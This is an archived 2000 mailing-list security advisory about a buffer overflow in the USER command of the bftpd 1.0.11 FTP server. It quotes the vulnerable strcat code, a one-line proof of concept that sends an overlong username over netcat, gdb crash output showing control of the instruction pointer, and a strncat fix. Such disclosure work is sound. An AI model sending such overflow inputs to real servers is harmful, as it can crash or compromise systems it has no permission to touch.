OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Potential Security Problem in bftpd-1.0.11
From: BAILLEUX Christophe (cbGROLIER.FR)
Date: Fri Oct 27 2000 - 11:23:33 CDT


Subject : Potential security problem in bftpd (Buffer Overflow)
Author : Christophe BAILLEUX (cbgrolier.fr)
Plateforms : *nix
Test version : bftpd-1.0.11

I. Introduction

bftpd is a Linux FTP server with chroot and setreuid. Not all FTP commands
are included.
It accesses either the user's home directory or its.
ftp subdirectory, and user authentication is via passwd/shadow or PAM.

II. Problem

The lastest version of bftp has a potential security problem when
entering the USER command.
The problem is a potential Overflow Vulnerability when entering more 35
characteres in USER command.

III. Details/Demo

a) Code problem

bftpd-1.0.11/commands.c

   102 void command_user(char *username) {
   103 char *alias;
   104 char name[USERLEN + 7] = "ALIAS_";
   105 if(state) {
   106 fprintf(stderr, "503 Username already given.\r\n");
   107 return;
   108 }
   109 alias = (char *) config_getoption(strcat(name, username));
   110 if(alias[0] != '\0')

b) Demo / gdb output

tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21

tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
Attaching to program: /usr/sbin/bftpd, Pid 6624
Reading symbols from /lib/libcrypt.so.1...done.
Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
0x400e7514 in read () from /lib/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) x $esp
0xbffffcb8: 0x41414141
(gdb)

IV. Exploit

It's not possible to exploit it with a standart exploit...
commands.c contains a piece of code filtering non-writable chars, eg : NOP, shellcode...

   469 for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer
garbage
 */
   470 if(str[i] < 32) {
   471 memmove((char *) ((int) str + i),
   472 (char *) ((int) str + i + 1),
   473 strlen(str) - i);
   474 i--; /* If junk is found, don't increment counter in next
loop. */
   475 }
   476 }

V. Workaround

In bftpd-1.0.11/commands.c

Modify the line 109

alias = (char *) config_getoption(strcat(name, username));

by

alias = (char *) config_getoption(strncat(name, username, USERLEN));

bftpd team has been informed.

VI. Greetings :)

Greetings to kalou, kli deda, Geudou deda and all DEDA TEAM!# :)
Thanks bdev for your help :)

Best regards,

--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cbgrolier.fr